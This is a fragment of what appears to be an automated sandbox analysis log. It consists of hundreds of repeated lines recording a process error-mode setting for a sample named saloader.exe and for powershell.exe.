                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
